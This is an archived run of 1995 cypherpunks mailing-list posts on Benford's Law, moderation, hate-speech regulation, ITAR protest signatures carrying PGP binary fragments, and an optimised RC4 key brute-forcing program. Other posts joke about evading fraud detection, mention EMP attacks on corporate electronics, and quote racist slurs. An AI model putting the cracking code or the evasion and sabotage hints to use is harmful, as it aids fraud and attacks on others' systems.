-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 11 Jul 1995 hardin@cyberspace.com wrote:

> John Young posted:
> 
> >    He's Got Their Number: Scholar Uses Math to Foil Financial
> >    Fraud
> > 
> prices are anything but random. A very heavy concentration of eights (8) &
> nines (9), apparently this company is more into $508.98 (color inkjet printer)
> & $38.98 (well known game s/w) than the old late night TV standby of
> "JUST $19.99!". Of course, this is because of excessively documented
> ad nauseum human psychological tendencies that salescritters, who set at
> least the lsd's of price, have been aware of for millenia. I'd bet, that
> 5(five), 8(eight), & 9(nine) are significantly more represented across
> the board in prices (& thus in amounts for checks & tax write offs) than
> than their random distribution by Benford's Law or more well known tests
> for randomness would suggest. Has Mr. Negrini factored this into his program?
> I guess the lesson is do a few pgp make__random's & convert a few of the
> hex numbers to dec digits for the lsd's the next time one does creative expense
> reporting.

check amounts will also include any relevant sales tax thus skewing the 
distribution in some fashion.


patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER ME for my pgp public key ** CRYPTO FOR THE MASSES!
zifi is a 486 DX4-100 running LINUX 1.2.10, send me all of your RAM now!


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMALPYk3Qo/lG0AH5AQE5PAP/fKnoVXL4SiCR5yv0NK0lUcdxW30q3NOL
ZSg+CnDWdW4QEbTGe6yi8mxcAQRQuxXwikL1qtfFrYgxhEN2nTiD2TrAuzRUbBOJ
c5X5ieC2drPUpITRUI6NvQA9H7IO7FRzQXH46RLosYpN4zy6EfzskbTZM/Zbj3cU
Wg7XHHFZcUo=
=+upl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael James Gebis <mjg51721@uxa.cso.uiuc.edu>
Date: Tue, 11 Jul 95 11:46:09 PDT
To: cypherpunks@toad.com
Subject: A more sophisticated form of moderation.
Message-ID: <199507111845.AA16926@uxa.cso.uiuc.edu>
MIME-Version: 1.0
Content-Type: text/plain


With all the recent traffic about if moderation is the future of the net,
it seems like an appropriate idea to get some brainstorming on some
better forms of moderation.

Specifically, I was thinking along the lines of a newsgroup where only
selected individuals are able to post, but anybody who wants to can read
the group.  However, the "selected individuals" could fall into several
categories.

You could have one or very few "selected individuals" and the newsgroup
would work almost exactly like the current moderated groups.

You could have many "selected individuals" who may have been selected by
proving that they read a FAQ or some other minimal criteria, which could
theoretically cut down on newbie fever.

You could have several dozen "selected individuals" who are selected by
some means (a committee?  a vote?  a "trusted individual who selects
more individuals") and have an unrestricted talk between these
individuals.  This way, you have a newsgroup where these experts can
discuss topics in an unrestricted way.  I'm thinking along the lines of
the "boards" in _Ender's Game_, where a newsgroup is somewhat similar to
a newspaper.  Once the reporters get hired, they have a lot of freedom
on what they can report about.  

There are a lot of details to be worked out, including:
1) Can such a system work?  Are there protocols which can guarantee
authentication on a large distributed system like news?  I'm assuming
that there would have to be some sort of cryptographic authentication to
prevent wide-scale abuse.

2) Is such a system desirable?  Is the current "anybody can post
anywhere if they know how" system better?  Which one promotes cypherpunk
goals more?  Can I anonymously prove that I am a "selected individual"?

Remember, I'm considering this a brainstorming session, so I'd like to
hear any comments you may have.

-- 
Mike Gebis  m-gebis@uiuc.edu    Mean people suck.
http://www.uiuc.edu/ph/www/m-gebis/



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Tue, 11 Jul 95 12:50:48 PDT
To: Al Thompson <alt@iquest.net>
Subject: Re: FW: Edupage 7/9/95 (fwd)
In-Reply-To: <m0sVh4K-000BSsC@dorite1.iquest.net>
Message-ID: <Pine.3.89.9507111300.B32568-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 11 Jul 1995, Al Thompson wrote:

> At 10:44 AM 7/11/95 -0400, Perry E. Metzger wrote:
> >
> >Brad Dolan writes:
> >> REGULATING THE INTERNET
> >> Shortly after the Communications Decency Act came before the U.S. Senate.,
> >> Canada's Parliament passed a resolution unanimously committing legislators
> >> to get tough with on-line hate-mongering.  The Simon Weisenthal Centre in
> >> Toronto sent a strongly worded report to federal regulator the CRTC calling
> >> for strict regulation of the Internet.  (Montreal Gazette 7/7/95 B3)
> >
> >I'm happy to see Nazism fought with fascism.
> >
> >.pm
>   
> You mean alleged nazism fought with obvious facism.
>  
> I've never seen any actual nazism on the net anywhere, but this "strict 
> regulation" tactic is obviously fascist in nature.
>  
> In fact, the only religious-based hate speech I've ever seen on the net is from
> someone named "windgate" or something who hates Christians and Christianity,
> and 
> is more than happy to write about his hatred.  He hangs out in some of the 
> 'alt.politics' groups.

You oughta go out and borrow someone's shortwave radio or ham HF radio. 
Between 3900 and 3900 KHz every evening, a bunch of guys in the south
(Texas, New Mexico, Arkansas, Louisiana) get on the air and talk about the
"goddamn niggers, jews, and fags that are ruining this country."  All
kinds of folks (meaning non-WASPs, of course) are targeted for this kind
of spew.  Words like "motherfucker" are often used, especially against
"niggers".  The speakers rail against "white women with goddamn niggers",
and any other non-WASP who happens to arouse their ire. 

Quite entertaining if you enjoy that sort of thing.  Stomach-turning if
you don't.  Call signs, times and frequencies heard upon request. 

This sort of thing has been going on for years.  A few years back, the FCC
attempted to go after a couple of idiots on one of the local LA area 2m
repeaters who were spewing all kinds of filth out onto the air waves.  The
district court said, naaah, that's free speech. 

So, if the idiots in Congress want to go after this sort of thing, they
oughts go after the few hams that are ruining the hobby for the rest of
us. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com (David Mandl)
Date: Tue, 11 Jul 95 11:29:11 PDT
To: cypherpunks@toad.com
Subject: Re: FW: Edupage 7/9/95 (fwd)
Message-ID: <199507111828.AA08553@bear-gate.bear.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@imsi.com> said:
 
> Mark Contois writes:
> > Would that this were so.  There seems to be a burgeoning number of web
> > sites spouting neo- (and not-so-neo-) Nazi disinfo.  Check out
> > 
> > 	http://204.181.176.4/stormfront/
> > 
> > and some of the links provided therein.
> 
> 204.181.176.4 is "stormfront.wat.com".
> 
> I suspect that something is amiss (i.e. faked) about the following,
> but wat.com shows up as

[etc.]

That may be (I wouldn't be surprised if they registered their
site with an innocent-sounding name to avoid trouble), but I
know that those guys are definitely on the net.  I've got
their URL at home and I take a look at their stuff now and
then, just to keep abreast of what those half-wits are up to.
There are at least a few bona fide Nazi/White Power sites out
there.

   --Dave.
--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or 
agreement or any information about any transaction, customer account or account 
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lyle Seaman <lws+@transarc.com>
Date: Tue, 11 Jul 95 12:06:57 PDT
To: cypherpunks@toad.com
Subject: Re: FW: Edupage 7/9/95 (fwd)
In-Reply-To: <9507111658.AA06104@elysion.iaks.ira.uka.de>
Message-ID: <wk0gTfuSMUw801MqNL@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


danisch@ira.uka.de (Hadmut Danisch) writes:
> There are certain nazi pages in America. They were showing them in
> a german tv magazine some time ago, but they didn't tell the URLs.
> The URL field in the Mosaic window was painted over.

Oh dear.  There are certain smut pages in Germany.  They were showing
them on TV recently, but I couldn't quite catch the URL.  I can see it
now -- the US government censors the net to keep out the Germans (but
the tourists can still come -- hey, at an average of $80K/year annual
income, they're welcome to go shopping in New York, though if they
want to change clothes on the beach they have to do *that* in
California, Florida is right out, eh Lawton?) and the Germans censor
the net to keep out the Americans.   Oh dear. 

--
Lyle		Transarc		707 Grant Street
412 338 4474	The Gulf Tower		Pittsburgh 15219





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Tue, 11 Jul 95 13:30:59 PDT
To: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Subject: Re: FW: Edupage 7/9/95 (fwd)
Message-ID: <m0sVlwb-000BVbC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:45 PM 7/11/95 +0100, Ed Carp [khijol Sysadmin] wrote:

>You oughta go out and borrow someone's shortwave radio or ham HF radio. 
>Between 3900 and 3900 KHz every evening, a bunch of guys in the south
>(Texas, New Mexico, Arkansas, Louisiana) get on the air and talk about the
>"goddamn niggers, jews, and fags that are ruining this country."  All
>kinds of folks (meaning non-WASPs, of course) are targeted for this kind
>of spew.  Words like "motherfucker" are often used, especially against
>"niggers".  The speakers rail against "white women with goddamn niggers",
>and any other non-WASP who happens to arouse their ire. 
>
>Quite entertaining if you enjoy that sort of thing.  Stomach-turning if
>you don't.  Call signs, times and frequencies heard upon request. 
  
I don't enjoy it, and don't particularly care to hear it - HOWEVER, I don't
see that they are harming anyone (I don't count "hurt feelings as "harm), 
any more than Malcolm X did when he called all white people "the devil," 
or when the militant Muslims do when they call all non-Muslims "heathens" 
or "the infidel" who should be killed.  (or any more than wingate does 
when he says all non-Jews should be done away with).  They are simply 
trying to "sell" their views by exposing their views.  
 
If they want to think that, and if they want to say that, then that is their 
business.  I'm free to listen, or to avoid listening.  I can avoid their 
newsgroups, or turn off my radio.  That doesn't mean I have to like them, or
be nice to them - I am just as free to ridicule their views, and I won't care 
if I hurt their feelings.
 
If this sort of speech is regulated however, I will no longer have that 
choice.  


If I ask the government to prevent them from speaking their views,
them only *I* am free to speak mine, so who is the victim?
  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hardin@cyberspace.com
Date: Tue, 11 Jul 95 14:40:03 PDT
To: "Patrick Finerty" <zinc@zifi.genetics.utah.edu>
Subject: Re: Num Rat
Message-ID: <9507112126.AA0326@localhost>
MIME-Version: 1.0
Content-Type: text/plain





//--- forwarded letter -------------------------------------------------------
> MIME-Version: 1.0
> Date: Tue, 11 Jul 95 13:22:33 -0600
> From: "zinc" <zinc@zifi.genetics.utah.edu>
> To: hardin@cyberspace.com
> Cc: cypherpunks@toad.com
> Subject: Re: Num Rat

Pat Finerty <zinc@zifi.genetics.utah.edu> wrote:
 
> On Tue, 11 Jul 1995 hardin@cyberspace.com wrote:
> 
> > John Young posted:
> > 
> > >    He's Got Their Number: Scholar Uses Math to Foil Financial
> > >    Fraud
> > > 
[snip]
> > I'd bet, that
> > 5(five), 8(eight), & 9(nine) are significantly more represented across
> > the board in prices (& thus in amounts for checks & tax write offs) than
> > than their random distribution by Benford's Law or more well known tests
> > for randomness would suggest.
[snip]
> 
> check amounts will also include any relevant sales tax thus skewing the 
> distribution in some fashion.
> 
> 
> patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
> U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
[snip]

Yes, and some vendors will be in state (sales tax) & some out of state (no
sales tax). Furthermore, if the vendor is in state but in a different locale,
there will probably be some difference in sales tax rates as rates within
states are usually based on vendor location. Also some types of purchases
for some types of businesses/organizations/entities have various sales tax
exemptions or surcharges, again all of which varies by state & locality.
ALL of these factors will skew the distribution, eg. sales tax is usualy
*.00% or *.25%, *.50%, *.75% etc. so a cursory look shows that 0 & 5 will
be over represented due to this factor.

tjh




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 11 Jul 95 13:26:13 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Down with ITAR - Have YOU exported PGP today? (fwd)
In-Reply-To: <12883.9507112010@exe.dcs.exeter.ac.uk>
Message-ID: <199507112023.QAA19240@bwnmr5.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| This is a forward of something I just cross-posted to alt.security.pgp,
| and talk.politics.crypto.  Civil disobedience via illegal .sigs.

	Just to pick a nit, the sig is not illegal.  The ITAR prior
restraints on free speech are.

Adam

(Proud owner of part 001. Get yours today!)

-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf


------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hardin@cyberspace.com
Date: Tue, 11 Jul 95 15:14:24 PDT
To: "Adam Back" <aba@atlas.ex.ac.uk>
Subject: PGP Anti- ITAR sig
Message-ID: <9507112213.AA0351@PPP53-139.cyberspace.com>
MIME-Version: 1.0
Content-Type: text/plain


Great Idea, Adam!

I am #5, who is #6 ;-)

tjh "T. J. Hardin" <hardin@cyberspace.com>

This is 1/713 of PGP262i DOS Executable Zipfile UUE'd
Violate the Un-Constitutional ITAR Today!
Get YOUR chunk @ web site below.

------------------ PGP.ZIP Part [005/713] -------------------
M@UIXP9EW\".^Q0XL1SO8"^*_O:U-=H(P&2,1A6YHB?KP@@H2/)$+P@-<PX_(
MPTGLPBHDHSW<(,<O,D$XB'2TA`HQ4D'H@R#<)[Z3*D$P80%N*8D1:Q6"T`\J
M/*/<G_$-/L9&%#L)P@HD82`ZHPG4$%#L*`A7D8M#F(/>"($GRAT$8246(Q:3
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Allen Robinson <sebaygo@intellinet.com>
Date: Tue, 11 Jul 95 15:19:33 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Stormfront (was Re: FW: Edupage 7/9/95 (fwd))
In-Reply-To: <9507111744.AA09457@snark.imsi.com>
Message-ID: <Pine.3.89.9507111731.B24086-0100000@sibyl.intellinet.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 11 Jul 1995, Perry E. Metzger wrote:

> Mark Contois writes:
>  
> > 	http://204.181.176.4/stormfront/
> > 
> > and some of the links provided therein.
> 
> 204.181.176.4 is "stormfront.wat.com".
> 
> I suspect that something is amiss (i.e. faked) about the following,
> but wat.com shows up as
> 
> Wongs Advanced Technologies (WAT-DOM)
>    3221 Danny Pk
>    Metairie, LA 70002
> 
>    Domain Name: WAT.COM

<snip>

I've seen the URL for the Stormfront White Nationalist Resource
Page listed at least three different ways.  I've never tried to
visit the site, but here are the three variations with the most
recent one I've seen listed last.

     http://www.accesscom.net/stormfront/


     http://www.stormfront.wat.com/stormfront/
          or
     http://stormfront.wat.com/stormfront/
          (my notes are kind of scrambled)


     htttp://www.stormfront.org/stormfront/


AR

_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
"They that can give up essential liberty to  :
purchase a little temporary safety, deserve  :         Allen Robinson
neither liberty nor safety."                 : sebaygo@intellinet.com
 - Benjamin Franklin, 1759                   :
PGP public key AD022AA9 fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A
available via major keyservers
             




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 11 Jul 95 18:42:01 PDT
To: Ray Cromwell <jim@acm.org
Subject: Re: Moby ints [Re: Num Rat]
Message-ID: <199507120139.SAA07236@shell1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:31 PM 7/11/95 -0400, Ray Cromwell wrote:
> However, it's only worthwhile for large
> numbers (>512 bits). At n=512, if your bigints are stored as polynomials
> with a 32-bit radix, then N=512/32=16. 16^1.5 = 64, 16 * lg(16) = 64
> (so the FFT method and the Karatsuba method are equivalent for numbers
> of that size)

I conjecture that the constant factor is rather smaller for the 
Karatsuba method, so the turnover should be somewhat higher than
512 bits.

Does anyone have any real experimental data on this question.

I assume Schonage has real experimental data?
--
  ------------------------------------------------------------------
We have the right to defend ourselves	|  http://www.jim.com/jamesd/
and our property, because of the kind	|
of animals that we are. True law	|  James A. Donald
derives from this right, not from the	|
arbitrary power of the omnipotent state.|  jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rfreeman@netaxs.com (Richard Freeman)
Date: Tue, 11 Jul 95 16:12:14 PDT
To: cypherpunks@toad.com
Subject: Re: Don't trust the net too much
Message-ID: <199507112312.TAA19079@access.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@bwh.harvard.edu> wrote:

>	I hate to join any thread which talks about blowing up rooms
>and killing security guards, but I'll point out that for a few
>hundered dollars worth of transmitter parts, you can cause transient
>failures with EMF pulse weapons, and for a bit more, you can fry all
>the electronics, then drive away before they have any idea that their
>company has been destroyed.
>
>	Killing people is a stupid way to accomplish things.

I would have to agree, and since this whole thread seems to be one of those 
conspiracy things, it is completely unnecessary to cause much at all in the 
way of physical damage.  No matter who rents the T1 lines and other forms of 
communication that unite an ISP with the rest of the world, sooner or later 
they have to enter some sort of communications node.  This could be a 
satellite or some huge telephone routing center, or any number of things.  
If the government wanted you shut down, all they have to do is find one of 
these things for each redundant line to an ISP and cut them all 
simultaneously.  I am sure a court order could be obtained very quickly to 
arrange such a thing, and even this may not be necessary.  I read in some 
magazine about ten years ago that all US-launched communications satellites 
contain software that allows the government to ascertain direct control over 
their functioning.  The purpose stated was that in the event of war the US 
is highly dependent on commercial satellites for non-military communications 
and can not afford to have the Soviets (or whatever foreign power) trying to 
reprogram our satellites utilizing security loopholes on the part of the 
owning company.  In any case, unless the ISP is actually expecting some 
terrorist group to attack their center and has taken deliberate steps to 
protect themselves (an absurdly expensive proposition for just about anyone 
except the military), I doubt there is much that could prevent even a 
private citizen from taking them out, let alone a well-organized group.
-----------------------------------------------------------------
Richard T. Freeman <rfreeman@netaxs.com> - finger for pgp key
3D CB AF BD FF E8 0B 10 4E 09 27 00 8D 27 E1 93 
http://www.netaxs.com/~rfreeman - ftp.netaxs.com/people/rfreeman





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 11 Jul 95 16:32:29 PDT
To: jim@acm.org
Subject: Re: Moby ints [Re: Num Rat]
In-Reply-To: <199507111851.LAA18222@mycroft.rand.org>
Message-ID: <199507112331.TAA12573@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



The state of the art in multiprecision integer arithmetic is Scho"nhage.
Schonhage invented the all-integer Fast-Fourier-Transform based 
big-int multiplication method. An n-bit can be multiplied in O(n ln n) 
operations. This is a big improvement over the Karatsuba method which is
O(n^1.5) and the classical method O(n^2). Surprisingly, the constant
factor isn't that large. This can be combined with modmult techniques
for fast modexp routines. However, it's only worthwhile for large
numbers (>512 bits). At n=512, if your bigints are stored as polynomials
with a 32-bit radix, then N=512/32=16. 16^1.5 = 64, 16 * lg(16) = 64
(so the FFT method and the Karatsuba method are equivalent for numbers
of that size)

If you are dealing with 2048 or 4096 bit keys, it starts to look attractive.


Schonhage published a book in the last year, the result of more than 10 
years of research into this area. It's hard to get a hold of though, you
have to order it from germany.

95-133299: Schonhage, Arnold.  Fast algorithms : a multitape Turing
     machine implementation /  Mannheim : B.I. Wissenschaftsverlag, 
     c1994.  x,
     297 p. : ill. ; 25 cm.

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Tue, 11 Jul 95 17:35:20 PDT
To: cypherpunks@toad.com
Subject: proxy down?
Message-ID: <199507120035.TAA28618@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain



Recent attempts to use the AOL proxy service have failed (it
used to work perfectly). Anybody else notice this?

Is anybody running a proxy2proxy setup?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Tue, 11 Jul 95 17:41:22 PDT
To: tcmay@sensemedia.net
Subject: My Experience with Moderated Lists and Groups
In-Reply-To: <ac272c6d0d02100462fc@[205.199.118.202]>
Message-ID: <199507120037.AA29650@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


(Forgive me if you've seen this twice... I got disconnected
the first time).

   From: tcmay@sensemedia.net (Timothy C. May)
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk


   I've been on several moderated mailing lists. There are those who moderate
   very lightly, moderately, and heavily.

I guess the first uses regular water as the moderator, and the latter
some sort of deuterated water. My nuclear physics is a little rusty,
though, so I have to ask: does the "moderately" moderated system use
liquid sodium?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Tue, 11 Jul 95 20:39:13 PDT
To: Michael James Gebis <cypherpunks@toad.com
Subject: Re: A more sophisticated form of moderation.
Message-ID: <199507120337.UAA03191@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:45 PM 7/11/95 -0500, Michael James Gebis wrote:
>Specifically, I was thinking along the lines of a newsgroup where only
>selected individuals are able to post, but anybody who wants to can read
>the group.  However, the "selected individuals" could fall into several
>categories.

Not hard to implement things like this.  With the current non-cryptoized
moderation system, anybody can post to a moderated group by putting an
"Approved:" header line on their article.  And articles can be cancelled by
anyone who wants to forge an cancel, so articles with forged approvals can
be cancelmoosed away if people want.  You could set up a cancelbot that trashes
any article that doesn't have the magic words from the FAQ
        Approved: Squeamish Ossifrage
in the header, or doesn't have the right digital signature in the approvals,
where you've only given teh keys to the Moderation Cabal.

Or, for a system where mail has to go to a moderator first, similar to the
current mail-to-moderator posting method, you could set up a mail-pool for
the moderator's address, that sends each article out to 1..N of the moderators
(e.g. to whoever's on duty today, or everybody, or a random k of the
moderators for
load-sharing), who could then post them.

If you want a mailing-list approach, they're easier - just send your mailing
list
through procmail on the mailhost, and set it up to accept/reject/etc. whoever
your list policy wants.

If somebody comes out with D News, the crypto-cancel-based system,
it can use a digital signature system like RIPEM-SIG (which is exportable)
or some equivalent we can build out of PGP after the PGP 3.0 toolkit
becomes available.

#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 11 Jul 95 13:10:28 PDT
To: cypherpunks@toad.com
Subject: Down with ITAR - Have YOU exported PGP today? (fwd)
Message-ID: <12883.9507112010@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



This is a forward of something I just cross-posted to alt.security.pgp,
and talk.politics.crypto.  Civil disobedience via illegal .sigs.

Adam

======================================================================
From: aba@dcs.ex.ac.uk
Newsgroups: alt.security.pgp,talk.politics.crypto
Date: Tue, 11 Jul 95 21:03:53 +0100
Subject: Down with ITAR - Have YOU exported PGP today?
Distribution: world


You all know about the ridiculous US regulation called ITAR and how it
applies to crypto software in the US, well here's a fun and relatively
safe (YMMV) way for you to export PGP in protest.

It is just a token effort, and of 0 practical significance, but the
idea is that you just post 3 lines of the uuencoded zipped DOS PGP
executable in place of your usual sig in protest.  If they lock you up
for 3 uuencoded lines which came off a European ftp site and European
web page, then well they are stupid.  More to the point it would make
them (the US state department and the NSA) look stupid.

Take a look at this web page:

	http://dcs.ex.ac.uk/~aba/export/

it will dole out uuencoded parts of PGP.EXE (the DOS binary for
pgp2.6.2i, the international version of PGP, as is available from
myriads of non-US ftp sites).

See my sig for a sample, the first in a long stream hopefully,

And remember, say NO to key escrow :-)

Adam
--
------------------ PGP.ZIP Part [000/713] -------------------
begin 644 pgp.zip
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Tue, 11 Jul 95 20:16:51 PDT
To: cypherpunks@toad.com
Subject: Denver area meeting, Saturday, 7/15, 2 pm
Message-ID: <VkzAwkkAsW0J084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


Once again, we'll congregate in the food court at the Tivoli,
adjacent to the Auraria campus, and possibly wander elsewhere.
We'll probably get updates on the David Triska and New Order
prosecutions, which have interesting 1st and 4th Amendment
ramifications, but there's no specific agenda.  Send email for
directions, etc.

Oh yeah, this goes out to "Louie da Misnamed" Freeh and the
Overseers of Freehdom, for their unceasing vigilance regarding
the transnational dissemination of Politically Incorrect Bits:

------------------ PGP.ZIP Part [006/713] -------------------
MPTGLPBHDHSW<(,<O,D$XB'2TA`HQ4D'H@R#<)[Z3*D$P80%N*8D1:Q6"T`\J
M/*/<G_$-/L9&%#L)P@HD82`ZHPG4$%#L*`A7D8M#F(/>"($GRAT$8246(Q:3
M$0`]G'"*AMF#]4C$1,S5"$(O!.%!+4$XAV/8@*7PAP>>J`6A$&>Q%W/1#,Z0
-------------------------------------------------------------

Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy L. Nali" <tn0s+@andrew.cmu.edu>
Date: Tue, 11 Jul 95 18:48:06 PDT
To: cypherpunks@toad.com
Subject: Re: Speedup of bruterc4.c
In-Reply-To: <9507111715.AA20916@netmail2.microsoft.com>
Message-ID: <4k0ma8K00iWS06o=cO@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


For linux boxes (or perhaps 486 and pentium machines in general), try
adding the flag -funroll-all-loops to the compile line.

    gcc -O2 -funroll-all-loops -m486 -o brute bruterc4.c


Here are my results on a Linux 486/33
Original code (Adam+Tatu)                               : 5405 keys/sec

Original code with -funroll-all-loops                   : 5991 keys/sec

Original code with Russell's changes                
and a couple of my own and -funroll-all-loops           : 6393 keys/sec



Here are the changes I made:

If we assume that the length of the cyphertext and known text is less
than 256 bytes, then the following works.  This gives you a whopping 40
additional keys/sec.

---------------------------------------------------------------------------
int rc4_eq(unsigned char *buffer_ptr, 
           unsigned char *known, 
           unsigned char *cypher_txt,
           int buffer_len, rc4_key *key)
{
  unsigned int t;
  unsigned int y = 0;
  unsigned char* state;
  unsigned int xorIndex;
  unsigned int counter;

  
  state = &key->state[0];

  for(counter=0;counter < buffer_len;counter++)
  {
    y = (state[counter+1] + y) & 0xFF;
    swap_byte(state[counter+1], state[y]);
    xorIndex = (state[counter+1] + state[y]) & 0xFF;
    buffer_ptr[counter] ^= state[xorIndex];
    if (known[counter] != buffer_ptr[counter])
    {
      memcpy(buffer_ptr,cypher_txt,counter+1);
      return 0;
    }
  }
  return 1;
}
--------------------------------------------------------------------------

Also, I could not get Russell's changes to work exactly as he posted
them (I suspect it's because I'm using a very old linux system).  Here's
my prepare_key function. I basically took out the counter++ parts.

--------------------------------------------------------------------------
/* excellent optimised prepare key by Tatu Ylonen ylo@cs.hut.fi */

void prepare_key(unsigned char *key_data_ptr, int key_data_len, rc4_key *key)
{
  unsigned int t;
  unsigned int index2;
  unsigned char* state;
  unsigned int counter;
  unsigned int k0, k1, k2, k3, k4;

  state = &key->state[0];
  memcpy(state,sequence,256);

  index2 = 0;
  k0 = key_data_ptr[0];
  k1 = key_data_ptr[1];
  k2 = key_data_ptr[2];
  k3 = key_data_ptr[3];
  k4 = key_data_ptr[4];
  for(counter = 0; counter < 255; counter+=5)
  {
    t = state[counter];
    index2 = (index2 + k0 + t) & 0xff;
    state[counter] = state[index2];
    state[index2] = t;


    t = state[counter + 1];
    index2 = (index2 + k1 + t) & 0xff;
    state[counter + 1] = state[index2];
    state[index2] = t;

    t = state[counter + 2];
    index2 = (index2 + k2 + t) & 0xff;
    state[counter + 2]  = state[index2];
    state[index2] = t;


    t = state[counter + 3];
    index2 = (index2 + k3 + t) & 0xff;
    state[counter + 3] = state[index2];
    state[index2] = t;


    t = state[counter + 4];
    index2 = (index2 + k4 + t) & 0xff;
    state[counter + 4]  = state[index2];
    state[index2] = t;

  }
  t = state[255];
  index2 = (index2 + k0 + t) & 0xff;
  state[255] = state[index2];
  state[index2] = t;

}
------------------------------------------------------------------------

_____________________________________________________________________________
 
 Tim Nali            \  "We are the music makers, and we are the dreamers of
 tn0s@andrew.cmu.edu  \   the dreams" -Willy Wonka and the Chocolate Factory






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Tue, 11 Jul 95 20:02:51 PDT
To: cypherpunks@toad.com
Subject: Re: RACIST MILITIA: ATF
Message-ID: <m0sVs4F-000BYfC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain



>> From owner-roc@xmission.com Tue Jul 11 11:10:37 1995
>> Date: Tue, 11 Jul 1995 13:45:37 -0400 (EDT)
>> From: Ian Goddard <igoddard@CapAccess.org>
>> To: Libernet@Dartmouth.edu
>> 
>
